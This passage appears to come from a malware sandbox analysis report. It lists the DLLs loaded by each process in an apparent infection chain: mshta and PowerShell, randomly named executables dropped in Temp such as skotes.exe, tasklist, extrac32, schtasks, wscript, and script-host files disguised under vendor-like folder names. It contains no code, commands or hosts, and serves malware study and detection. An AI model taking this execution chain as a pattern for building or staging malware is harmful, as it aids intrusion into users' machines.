Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Section loaded: uxtheme.dll
